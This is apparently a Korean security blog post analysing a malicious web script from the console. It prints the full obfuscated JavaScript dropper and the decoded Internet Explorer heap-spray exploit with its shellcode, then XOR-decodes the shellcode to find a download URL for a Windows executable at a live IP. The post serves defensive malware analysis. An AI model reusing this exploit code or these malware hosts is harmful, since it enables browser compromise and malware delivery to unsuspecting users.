콘솔 환경에서 악성 스크립트 분석하기! (2)

이번에는 조금 형태가 다른 악성 스크립트를 확인해 보도록 하겠습니다.

[byjjoon@ByJJoon Script Analysis]$ wget http://61.100.7.171/css/lib.asp
--2010-05-09 19:33:23--  http://61.100.7.171/css/lib.asp
Connecting to 61.100.7.171:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5851 (5.7K) [text/html]
Saving to: `lib.asp'

100%[===============================================================================================================>] 5,851       --.-K/s   in 0.008s  

2010-05-09 19:33:23 (749 KB/s) - `lib.asp' saved [5851/5851]

[byjjoon@ByJJoon Script Analysis]$ cat lib.asp 

<SCRIPT LANGUAGE="JavaScript" defer>function a(p){var j,t;j="";for(i=1;i<=p.length;i++){if((i%2)==0){t="0x"+p.substr(i-2,2);t=t.toString(10)-18;
j=j+String.fromCharCode(t);}}return j;}
var x=a("4E748786868180327B764F397F818039328180757E7B757D4F3985757E7B757D3A3B4D393265666B5E574F39565B65625E536B4C6061605739504E41748786868180504E8575847B8286327E738079877379774F345C7388736575847B828634327677787784503278878075867B818032757C7F3A853B8D3288738432848586843E804D32804F34344D32788184323A7B4F434D7B4E4F85407E778079867A324D7B3D3D323B328D327B78323A3A7B323732463B4F4F423B328D3284858684324F32343787343D85408587748586843A7B3F443E443B3D85408587748586843A7B3F463E443B4D32804F3280323D32848586844D328F328F328477868784803287807785757382773A803B4D328F32887384327E88324F32757C7F3A344B424B424B424B42474A474A474A474A57544342475446544545554B4848544B544A42454A424546425454565744585357544247574A5754585858585858474653455457545654565744564B43554A565456545654564548585654434548555653434342454856475447454846535649535557464747424554585456545644564758464756474A574A58545654565647574A5557564A5558574B45485854544347474245545554565456454847475649544A57464747444554585456545647584646564756445645545654565647554A555856435642574B46445354454A4956554A5357564756445645545654565647554A555856435642574B45485854544347474545545554565456454847475649545557464747564554585456545647584646564756434A574A585456564755575647564A5643574B454858545443474756445455545654564548474756495455574647475844545854565456475846464555474354565455545654564548484345554957455654565456545656495456564953495757564954564644575457434A574956585645564A4354575456554A46464953544B5457574356574B45564A4953584B5457544B5547564A545654564A574946575557555757575357554A57495645485854574747474B585455545654564557464754564746435754565456545644565649545656495456564954575649545656495458564754565456545649565757454858544B4B47475455545554565456454658545656564954565756464457544B4745465854564B4548585456565649545656495456564954565649544B564954565756464457544B43564954565649545656495456564753445456544454565756464457544A4345465854554745485845564B4556554354474644424B554B544345565543544746445456554B544A4556554B54474644424B47584748454645544556545654565456495358545556545654565456545649535854554B54565456545654565649545656495456564954564548585456565756464457544A474548455445565456545654565649545645425845554B57554644555455565756464455545656464457544A56464455545656464457544A4B464455545547464457545856454846484A5749564A5748484555474354565458545654564548494345574647574B5542544745465343545545574956544B4748465745484943454848464557495753564A57495657565755575757565756575657565756575657535756575646445754544745485545574B474753565455545654564747564A54565456545656475657555455535456564755575647564B5644574B45485854544347474B4B545654565456454658544A43564B4355544B5456545654564542435656564644464446445649564A464455544A43454858545356474754475456545654564A57484857575757575757574644485645564A47474745564A474746554A535545555547544A4456445644564456554B544745484644574A4548474345425856544A4644475647474354545654565456495747474356545654565456424753555455544B4556495854435456474744575456545654564555474354565455545654564548464345574953544B495354534A58554B4455544349535853544B56574546485558444953585354474356564A4453494849535853544357555856424955444953585353564A45534242544A4649535853534B42475646484B53484953585353474245554456544356495358535343464343464A534342495358534B564447544953564647564B43554A565456545654564548585654434548555653434342454856475447454846535649544B57464747574B54565456545644564758464756474A574A58545654565647574A5557564A5558574B454854544747574A464446444644454847475649544A574647474A4A545654565456475846464A574644575346445754544B4748545857474957474746464644464446445748495454534247454657445455565449535853544A464447564957575745484843575756495856564754565356545654565753454858544B564747534746444644464457474957575557544548554A4A434548554B4B4555475457464A5754454855544B565457464A4A5749465846585543425457494A4A5748485444424553564A494854554B5447495549485453545748495856474846554A485344554A47535745454857454B4B545748425654454854435848454857455343545748424548544B45485457494A434857455746495747474842464346444644425846584758464B4A464758554245574849584755484A424A58554B44555443454A484443444248565745464855584457555856424955444356564A445349485345434B564B474444574A58474B444B45455357544943434958534658485455494B45425344554B5753565454424644585742454343484855424656434A444957584645435348494A45534242544A4642475646484B53484245554456544356464343464A5343424447544953564647455648544344444946485757534A76745647554B554B55564A494B444B444A544A554B454A554A564A564B454A554B454A464A574B445657555755574B445646555756554B45564A5547564A545654565456545654565456545654565456545654565456545654565456545654565456545657535753343B4D328873843255738484324F3280778932538484738B3A3B4D887384327B86324F32428A4A48424242323F327E88407E778079867A3C444D8873843289787E7379324F3234378742754275378742754275344D887384327D85324F3287807785757382773A89787E73793B4D897A7B7E773A7D85407E778079867A324E327B8641443B327D85323D4F7D854D8873843282324F327D85408587748586847B80793A423E327B8641443B4D76777E778677327D854D7881843A7B4F424D7B4E4449424D7B3D3D3B8D557384846D7B6F324F32823D823D7E884D8F78878075867B81803285757E7B757D3A3B8D88738432855481768B324F32768175877F77808640758477738677577E777F7780863A345461566B343B4D855481768B4073767654777A73887B81843A343576777873877E86358785778456738673343B4D768175877F77808640738282778076557A7B7E763A855481768B3B4D86848B8D788184323A7B4F424D7B4E43424D7B3D3D3B8D855481768B40857786538686847B748786773A3985393E897B807681893B4D8F8F757386757A3A773B8D8F897B80768189408586738687853D4F39394D8F768175877F77808640797786577E777F778086548B5B763A347F8180343B408180757E7B757D3A3B4D4E418575847B828650");  
window.document.write(x);
window.location.reload();
</SCRIPT>

<script src="http://s33.cnzz.com/stat.php?id=2030218&web_id=2030218" language="JavaScript"></script>

뭔가 복잡하게 꼬여 있는거 같지만 아주 간단합니다. 해당 스크립트를 아래와 같이 수정합니다.

function a(p){var j,t;j="";for(i=1;i<=p.length;i++){if((i%2)==0){t="0x"+p.substr(i-2,2);t=t.toString(10)-18;
j=j+String.fromCharCode(t);}}return j;}
var x=a("4E748786868180327B764F397F818039328180757E7B757D4F3985757E7B757D3A3B4D393265666B5E574F39565B65625E536B4C6061605739504E41748786868180504E8575847B8286327E738079877379774F345C7388736575847B828634327677787784503278878075867B818032757C7F3A853B8D3288738432848586843E804D32804F34344D32788184323A7B4F434D7B4E4F85407E778079867A324D7B3D3D323B328D327B78323A3A7B323732463B4F4F423B328D3284858684324F32343787343D85408587748586843A7B3F443E443B3D85408587748586843A7B3F463E443B4D32804F3280323D32848586844D328F328F328477868784803287807785757382773A803B4D328F32887384327E88324F32757C7F3A344B424B424B424B42474A474A474A474A57544342475446544545554B4848544B544A42454A424546425454565744585357544247574A5754585858585858474653455457545654565744564B43554A565456545654564548585654434548555653434342454856475447454846535649535557464747424554585456545644564758464756474A574A58545654565647574A5557564A5558574B45485854544347474245545554565456454847475649544A57464747444554585456545647584646564756445645545654565647554A555856435642574B46445354454A4956554A5357564756445645545654565647554A555856435642574B45485854544347474545545554565456454847475649545557464747564554585456545647584646564756434A574A585456564755575647564A5643574B454858545443474756445455545654564548474756495455574647475844545854565456475846464555474354565455545654564548484345554957455654565456545656495456564953495757564954564644575457434A574956585645564A4354575456554A46464953544B5457574356574B45564A4953584B5457544B5547564A545654564A574946575557555757575357554A57495645485854574747474B585455545654564557464754564746435754565456545644565649545656495456564954575649545656495458564754565456545649565757454858544B4B47475455545554565456454658545656564954565756464457544B4745465854564B4548585456565649545656495456564954565649544B564954565756464457544B43564954565649545656495456564753445456544454565756464457544A4345465854554745485845564B4556554354474644424B554B544345565543544746445456554B544A4556554B54474644424B47584748454645544556545654565456495358545556545654565456545649535854554B54565456545654565649545656495456564954564548585456565756464457544A474548455445565456545654565649545645425845554B57554644555455565756464455545656464457544A56464455545656464457544A4B464455545547464457545856454846484A5749564A5748484555474354565458545654564548494345574647574B5542544745465343545545574956544B4748465745484943454848464557495753564A57495657565755575757565756575657565756575657535756575646445754544745485545574B474753565455545654564747564A54565456545656475657555455535456564755575647564B5644574B45485854544347474B4B545654565456454658544A43564B4355544B5456545654564542435656564644464446445649564A464455544A43454858545356474754475456545654564A57484857575757575757574644485645564A47474745564A474746554A535545555547544A4456445644564456554B544745484644574A4548474345425856544A4644475647474354545654565456495747474356545654565456424753555455544B4556495854435456474744575456545654564555474354565455545654564548464345574953544B495354534A58554B4455544349535853544B56574546485558444953585354474356564A4453494849535853544357555856424955444953585353564A45534242544A4649535853534B42475646484B53484953585353474245554456544356495358535343464343464A534342495358534B564447544953564647564B43554A565456545654564548585654434548555653434342454856475447454846535649544B57464747574B54565456545644564758464756474A574A58545654565647574A5557564A5558574B454854544747574A464446444644454847475649544A574647474A4A545654565456475846464A574644575346445754544B4748545857474957474746464644464446445748495454534247454657445455565449535853544A464447564957575745484843575756495856564754565356545654565753454858544B564747534746444644464457474957575557544548554A4A434548554B4B4555475457464A5754454855544B565457464A4A5749465846585543425457494A4A5748485444424553564A494854554B5447495549485453545748495856474846554A485344554A47535745454857454B4B545748425654454854435848454857455343545748424548544B45485457494A434857455746495747474842464346444644425846584758464B4A464758554245574849584755484A424A58554B44555443454A484443444248565745464855584457555856424955444356564A445349485345434B564B474444574A58474B444B45455357544943434958534658485455494B45425344554B5753565454424644585742454343484855424656434A444957584645435348494A45534242544A4642475646484B53484245554456544356464343464A5343424447544953564647455648544344444946485757534A76745647554B554B55564A494B444B444A544A554B454A554A564A564B454A554B454A464A574B445657555755574B445646555756554B45564A5547564A545654565456545654565456545654565456545654565456545654565456545654565456545657535753343B4D328873843255738484324F3280778932538484738B3A3B4D887384327B86324F32428A4A48424242323F327E88407E778079867A3C444D8873843289787E7379324F3234378742754275378742754275344D887384327D85324F3287807785757382773A89787E73793B4D897A7B7E773A7D85407E778079867A324E327B8641443B327D85323D4F7D854D8873843282324F327D85408587748586847B80793A423E327B8641443B4D76777E778677327D854D7881843A7B4F424D7B4E4449424D7B3D3D3B8D557384846D7B6F324F32823D823D7E884D8F78878075867B81803285757E7B757D3A3B8D88738432855481768B324F32768175877F77808640758477738677577E777F7780863A345461566B343B4D855481768B4073767654777A73887B81843A343576777873877E86358785778456738673343B4D768175877F77808640738282778076557A7B7E763A855481768B3B4D86848B8D788184323A7B4F424D7B4E43424D7B3D3D3B8D855481768B40857786538686847B748786773A3985393E897B807681893B4D8F8F757386757A3A773B8D8F897B80768189408586738687853D4F39394D8F768175877F77808640797786577E777F778086548B5B763A347F8180343B408180757E7B757D3A3B4D4E418575847B828650");  
print(x);

수정 전 후를 비교하면 아래와 같습니다.

[byjjoon@ByJJoon Script Analysis]$ diff lib.asp lib_modify.asp 
1,2c1
< 
< <SCRIPT LANGUAGE="JavaScript" defer>function a(p){var j,t;j="";for(i=1;i<=p.length;i++){if((i%2)==0){t="0x"+p.substr(i-2,2);t=t.toString(10)-18;
---
> function a(p){var j,t;j="";for(i=1;i<=p.length;i++){if((i%2)==0){t="0x"+p.substr(i-2,2);t=t.toString(10)-18;
5,9c4
< window.document.write(x);
< window.location.reload();
< </SCRIPT>
< 
< <script src="http://s33.cnzz.com/stat.php?id=2030218&web_id=2030218" language="JavaScript"></script>
\ No newline at end of file
---
> print(x);
[byjjoon@ByJJoon Script Analysis]$ 

이제 SpiderMonkey를 이용하여 스크립트를 확인해 보도록 하겠습니다.

[byjjoon@ByJJoon Script Analysis]$ js lib_modify.asp 
<button id='mon' onclick='sclick();' STYLE='DISPLAY:NONE'></button><script language="JavaScript" defer> function cjm(s){ var rstr,n; n=""; for (i=1;i<=s.length ;i++ ) { if ((i % 4)==0) { rstr = "%u"+s.substr(i-2,2)+s.substr(i-4,2); n= n + rstr; } } return unescape(n); } var lv = cjm("9090909058585858EB105B4B33C966B9B80380340BBDE2FAEB05E8EBFFFFFF54A3BEBDBDE2D91C8DBDBDBD36FDB136CDA11036D5B5364AD7ACE45503BFBDBD2D5F45D58E8FBDBDD5E8CED8CFE936FBB15503BCBDBD3655D7B8E45523BFBDBD5F44D5D2D3BDBDD5C8CFD1D0E942AB387DC8AED5D2D3BDBDD5C8CFD1D0E936FBB15533BCBDBD3655D7BCE455D3BFBDBD5F44D5D18E8FBDD5CED5D8D1E936FBB155D2BCBDBD3655D7BCE455F2BFBDBD5F443C51BDBCBDBD36613C7E3DBDBDBDD7BDD7A7EED7BD42EBE18E7DFD3D81BEBDC8447AB9BEE1DE93D87AF9BEB9C5D8BDBD8E74ECECEEEAEC8E7D36FBE5559FBCBDBD3E45BD541EBDBDBD2DD7BDD7BDD7BED7BDD7BFD5BDBDBD7DEE36FB9955BCBCBDBD34FBDDD7BDED42EB9534FBD936FBDDD7BDD7BDD7BDD7B9D7BDED42EB91D7BDD7BDD7BDD5A2BDB2BDED42EB8134FBC536F3D93DC1B54209C9B13DC1B542BDC9B83DC9B542095F56343B3DBDBDBD7AFBCDBDBDBDBD7AFBC9BDBDBDBDD7BDD7BDD7BD36FBDDED42EB85363B3DBDBDBDD7BD30F3C9EC42CBCDED42CBDD42EB8D42CBDD42EB8942CBC542EBFD36468E7D8E663C51BDBFBDBD36713E45E9C0B534A1BC3E7DB9564E367136643E7EAD8E7DEDECEEEDEDEDEDEDEDEAEDED42EBB536C3E955ADBCBDBD55D8BDBDBDD5DECBCABDD5CED5D9D2E936FBB15599BDBDBD34FB81D91CB9BDBDBD301DDD424242D7D842CB8136FBAD55B5BDBDBD8E66EEEEEEEE426D3D85553D8554C8AC3CC5B82D2D2D2DC9B53642E8365130FDB8425D551BBDBDBD7E551DBDBDBD05ACBCB93D7FB1BD552EBDBDBD3C51BDBCBDBD36413E7AB97ABA8FC92CB17AFAB9DE346CF27AFAB51DD82A767AFAB1ECFD07C27AFAAD83A00B847AFAA905D469A67AFAA503C2DB1D7AFAA141148A107AFA9D25B7AD45D91C8DBDBDBD36FDB136CDA11036D5B5364AD7B9E455E9BDBDBD2D5F45D58E8FBDBDD5E8CED8CFE936BB55E84242423655D7B8E45588BDBDBD5F448E42EA42EBB956BFE57E5544424242E67BBA0534E2BCDB7AFAB8425D7EEE3661EED7FDD5BDADBDBDEA36FB9D55A5424242E57EECEB36C88136C993C5BE48EB36CB9DBE488E74F4FC10BE788E66B203AD876BC9B57C76BABE67FD564C86A2C85AE336E399BE60DB36B1F636E3A1BE6036B936BE7816E3E47E55604142420F4F5F49845FC03E67F5C6808FC92CB138621206DE346CF2ECFD07C21DD82A76A319D9522E8F592933AEB7117FA4F6BC7930A2C9EADBB042FE031166C04D1827EF431A6783A00B8405D469A603C2DB1D41148A1025B7AD453D6B122746EEA8dbD5C9C9CD8792928B8C938C8D8D938C93848E92DECECE92D4CEDC93D8C5D8BDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDEAEA"); var Carr = new Array();var it = 0x86000 - lv.length*2;var wflag = "%u0c0c%u0c0c";var ks = unescape(wflag);while(ks.length < it/2) ks +=ks;var p = ks.substring(0, it/2);delete ks;for(i=0;i<270;i++){Carr[i] = p+p+lv;}function sclick(){var sBody = document.createElement("BODY");sBody.addBehavior("#default#userData");document.appendChild(sBody);try{for (i=0;i<10;i++){sBody.setAttribute('s',window);}}catch(e){}window.status+='';}document.getElementById("mon").onclick();</script>
[byjjoon@ByJJoon Script Analysis]$ 

스크립트를 출력 하니 Hex값으로 보이는 값이 보이는군요. 해당 부분만 따로 뽑아 hex.dump로 저장하도록 하겠습니다.

[byjjoon@ByJJoon Script Analysis]$ python -c "import binascii; print binascii.unhexlify('9090909058585858EB105B4B33C966B9B80380340BBDE2FAEB05E8EBFFFFFF54A3BEBDBDE2D91C8DBDBDBD36FDB136CDA11036D5B5364AD7ACE45503BFBDBD2D5F45D58E8FBDBDD5E8CED8CFE936FBB15503BCBDBD3655D7B8E45523BFBDBD5F44D5D2D3BDBDD5C8CFD1D0E942AB387DC8AED5D2D3BDBDD5C8CFD1D0E936FBB15533BCBDBD3655D7BCE455D3BFBDBD5F44D5D18E8FBDD5CED5D8D1E936FBB155D2BCBDBD3655D7BCE455F2BFBDBD5F443C51BDBCBDBD36613C7E3DBDBDBDD7BDD7A7EED7BD42EBE18E7DFD3D81BEBDC8447AB9BEE1DE93D87AF9BEB9C5D8BDBD8E74ECECEEEAEC8E7D36FBE5559FBCBDBD3E45BD541EBDBDBD2DD7BDD7BDD7BED7BDD7BFD5BDBDBD7DEE36FB9955BCBCBDBD34FBDDD7BDED42EB9534FBD936FBDDD7BDD7BDD7BDD7B9D7BDED42EB91D7BDD7BDD7BDD5A2BDB2BDED42EB8134FBC536F3D93DC1B54209C9B13DC1B542BDC9B83DC9B542095F56343B3DBDBDBD7AFBCDBDBDBDBD7AFBC9BDBDBDBDD7BDD7BDD7BD36FBDDED42EB85363B3DBDBDBDD7BD30F3C9EC42CBCDED42CBDD42EB8D42CBDD42EB8942CBC542EBFD36468E7D8E663C51BDBFBDBD36713E45E9C0B534A1BC3E7DB9564E367136643E7EAD8E7DEDECEEEDEDEDEDEDEDEAEDED42EBB536C3E955ADBCBDBD55D8BDBDBDD5DECBCABDD5CED5D9D2E936FBB15599BDBDBD34FB81D91CB9BDBDBD301DDD424242D7D842CB8136FBAD55B5BDBDBD8E66EEEEEEEE426D3D85553D8554C8AC3CC5B82D2D2D2DC9B53642E8365130FDB8425D551BBDBDBD7E551DBDBDBD05ACBCB93D7FB1BD552EBDBDBD3C51BDBCBDBD36413E7AB97ABA8FC92CB17AFAB9DE346CF27AFAB51DD82A767AFAB1ECFD07C27AFAAD83A00B847AFAA905D469A67AFAA503C2DB1D7AFAA141148A107AFA9D25B7AD45D91C8DBDBDBD36FDB136CDA11036D5B5364AD7B9E455E9BDBDBD2D5F45D58E8FBDBDD5E8CED8CFE936BB55E84242423655D7B8E45588BDBDBD5F448E42EA42EBB956BFE57E5544424242E67BBA0534E2BCDB7AFAB8425D7EEE3661EED7FDD5BDADBDBDEA36FB9D55A5424242E57EECEB36C88136C993C5BE48EB36CB9DBE488E74F4FC10BE788E66B203AD876BC9B57C76BABE67FD564C86A2C85AE336E399BE60DB36B1F636E3A1BE6036B936BE7816E3E47E55604142420F4F5F49845FC03E67F5C6808FC92CB138621206DE346CF2ECFD07C21DD82A76A319D9522E8F592933AEB7117FA4F6BC7930A2C9EADBB042FE031166C04D1827EF431A6783A00B8405D469A603C2DB1D41148A1025B7AD453D6B122746EEA8dbD5C9C9CD8792928B8C938C8D8D938C93848E92DECECE92D4CEDC93D8C5D8BDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDBDEAEA')" > hex.dump
[byjjoon@ByJJoon Script Analysis]$ xxd hex.dump 
0000000: 9090 9090 5858 5858 eb10 5b4b 33c9 66b9  ....XXXX..[K3.f.
0000010: b803 8034 0bbd e2fa eb05 e8eb ffff ff54  ...4...........T
0000020: a3be bdbd e2d9 1c8d bdbd bd36 fdb1 36cd  ...........6..6.
0000030: a110 36d5 b536 4ad7 ace4 5503 bfbd bd2d  ..6..6J...U....-
0000040: 5f45 d58e 8fbd bdd5 e8ce d8cf e936 fbb1  _E...........6..
0000050: 5503 bcbd bd36 55d7 b8e4 5523 bfbd bd5f  U....6U...U#..._
0000060: 44d5 d2d3 bdbd d5c8 cfd1 d0e9 42ab 387d  D...........B.8}
0000070: c8ae d5d2 d3bd bdd5 c8cf d1d0 e936 fbb1  .............6..
0000080: 5533 bcbd bd36 55d7 bce4 55d3 bfbd bd5f  U3...6U...U...._
0000090: 44d5 d18e 8fbd d5ce d5d8 d1e9 36fb b155  D...........6..U
00000a0: d2bc bdbd 3655 d7bc e455 f2bf bdbd 5f44  ....6U...U...._D
00000b0: 3c51 bdbc bdbd 3661 3c7e 3dbd bdbd d7bd  <Q....6a<~=.....
00000c0: d7a7 eed7 bd42 ebe1 8e7d fd3d 81be bdc8  .....B...}.=....
00000d0: 447a b9be e1de 93d8 7af9 beb9 c5d8 bdbd  Dz......z.......
00000e0: 8e74 ecec eeea ec8e 7d36 fbe5 559f bcbd  .t......}6..U...
00000f0: bd3e 45bd 541e bdbd bd2d d7bd d7bd d7be  .>E.T....-......
0000100: d7bd d7bf d5bd bdbd 7dee 36fb 9955 bcbc  ........}.6..U..
0000110: bdbd 34fb ddd7 bded 42eb 9534 fbd9 36fb  ..4.....B..4..6.
0000120: ddd7 bdd7 bdd7 bdd7 b9d7 bded 42eb 91d7  ............B...
0000130: bdd7 bdd7 bdd5 a2bd b2bd ed42 eb81 34fb  ...........B..4.
0000140: c536 f3d9 3dc1 b542 09c9 b13d c1b5 42bd  .6..=..B...=..B.
0000150: c9b8 3dc9 b542 095f 5634 3b3d bdbd bd7a  ..=..B._V4;=...z
0000160: fbcd bdbd bdbd 7afb c9bd bdbd bdd7 bdd7  ......z.........
0000170: bdd7 bd36 fbdd ed42 eb85 363b 3dbd bdbd  ...6...B..6;=...
0000180: d7bd 30f3 c9ec 42cb cded 42cb dd42 eb8d  ..0...B...B..B..
0000190: 42cb dd42 eb89 42cb c542 ebfd 3646 8e7d  B..B..B..B..6F.}
00001a0: 8e66 3c51 bdbf bdbd 3671 3e45 e9c0 b534  .f<Q....6q>E...4
00001b0: a1bc 3e7d b956 4e36 7136 643e 7ead 8e7d  ..>}.VN6q6d>~..}
00001c0: edec eeed eded eded edea eded 42eb b536  ............B..6
00001d0: c3e9 55ad bcbd bd55 d8bd bdbd d5de cbca  ..U....U........
00001e0: bdd5 ced5 d9d2 e936 fbb1 5599 bdbd bd34  .......6..U....4
00001f0: fb81 d91c b9bd bdbd 301d dd42 4242 d7d8  ........0..BBB..
0000200: 42cb 8136 fbad 55b5 bdbd bd8e 66ee eeee  B..6..U.....f...
0000210: ee42 6d3d 8555 3d85 54c8 ac3c c5b8 2d2d  .Bm=.U=.T..<..--
0000220: 2d2d c9b5 3642 e836 5130 fdb8 425d 551b  --..6B.6Q0..B]U.
0000230: bdbd bd7e 551d bdbd bd05 acbc b93d 7fb1  ...~U........=..
0000240: bd55 2ebd bdbd 3c51 bdbc bdbd 3641 3e7a  .U....<Q....6A>z
0000250: b97a ba8f c92c b17a fab9 de34 6cf2 7afa  .z...,.z...4l.z.
0000260: b51d d82a 767a fab1 ecfd 07c2 7afa ad83  ...*vz......z...
0000270: a00b 847a faa9 05d4 69a6 7afa a503 c2db  ...z....i.z.....
0000280: 1d7a faa1 4114 8a10 7afa 9d25 b7ad 45d9  .z..A...z..%..E.
0000290: 1c8d bdbd bd36 fdb1 36cd a110 36d5 b536  .....6..6...6..6
00002a0: 4ad7 b9e4 55e9 bdbd bd2d 5f45 d58e 8fbd  J...U....-_E....
00002b0: bdd5 e8ce d8cf e936 bb55 e842 4242 3655  .......6.U.BBB6U
00002c0: d7b8 e455 88bd bdbd 5f44 8e42 ea42 ebb9  ...U...._D.B.B..
00002d0: 56bf e57e 5544 4242 42e6 7bba 0534 e2bc  V..~UDBBB.{..4..
00002e0: db7a fab8 425d 7eee 3661 eed7 fdd5 bdad  .z..B]~.6a......
00002f0: bdbd ea36 fb9d 55a5 4242 42e5 7eec eb36  ...6..U.BBB.~..6
0000300: c881 36c9 93c5 be48 eb36 cb9d be48 8e74  ..6....H.6...H.t
0000310: f4fc 10be 788e 66b2 03ad 876b c9b5 7c76  ....x.f....k..|v
0000320: babe 67fd 564c 86a2 c85a e336 e399 be60  ..g.VL...Z.6...`
0000330: db36 b1f6 36e3 a1be 6036 b936 be78 16e3  .6..6...`6.6.x..
0000340: e47e 5560 4142 420f 4f5f 4984 5fc0 3e67  .~U`ABB.O_I._.>g
0000350: f5c6 808f c92c b138 6212 06de 346c f2ec  .....,.8b...4l..
0000360: fd07 c21d d82a 76a3 19d9 522e 8f59 2933  .....*v...R..Y)3
0000370: aeb7 117f a4f6 bc79 30a2 c9ea dbb0 42fe  .......y0.....B.
0000380: 0311 66c0 4d18 27ef 431a 6783 a00b 8405  ..f.M.'.C.g.....
0000390: d469 a603 c2db 1d41 148a 1025 b7ad 453d  .i.....A...%..E=
00003a0: 6b12 2746 eea8 dbd5 c9c9 cd87 9292 8b8c  k.'F............
00003b0: 938c 8d8d 938c 9384 8e92 dece ce92 d4ce  ................
00003c0: dc93 d8c5 d8bd bdbd bdbd bdbd bdbd bdbd  ................
00003d0: bdbd bdbd bdbd bdbd eaea 0a              ...........

이제 저장한 값을 이전 포스팅에 소개했던 XOR키를 찾는 스크립트를 이용하여 다운로드 URL을 찾아 보도록 하겠습니다.

[byjjoon@ByJJoon Script Analysis]$ ./xor_search.py hex.dump http
[+] Start
[+] Find key : 0xbd
[+] Apply XOR : http://61.100.1.93/css/isa.exe
[+] End
[byjjoon@ByJJoon Script Analysis]$ 

주소가 나왔습니다. 해당 파일을 다운로드 해서 확인해 보도록 하겠습니다.

[byjjoon@ByJJoon Script Analysis]$ wget http://61.100.1.93/css/isa.exe
--2010-05-09 19:49:08--  http://61.100.1.93/css/isa.exe
Connecting to 61.100.1.93:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 53248 (52K) [application/octet-stream]
Saving to: `isa.exe'

100%[===============================================================================================================>] 53,248      --.-K/s   in 0.07s   

2010-05-09 19:49:08 (715 KB/s) - `isa.exe' saved [53248/53248]

[byjjoon@ByJJoon Script Analysis]$ file isa.exe 
isa.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
[byjjoon@ByJJoon Script Analysis]$ 

여기까지 콘솔 환경에서 악성 스크립트를 분석하는 글을 마치겠습니다. Malzilla나 기타 툴을 이용하는 것이 훨씬 편하지만 언젠가 해당 포스트가 쓰임이 있으리라 생각합니다..

  • EOF -

답글 남기기

이메일 주소는 공개되지 않습니다. 필수 필드는 *로 표시됩니다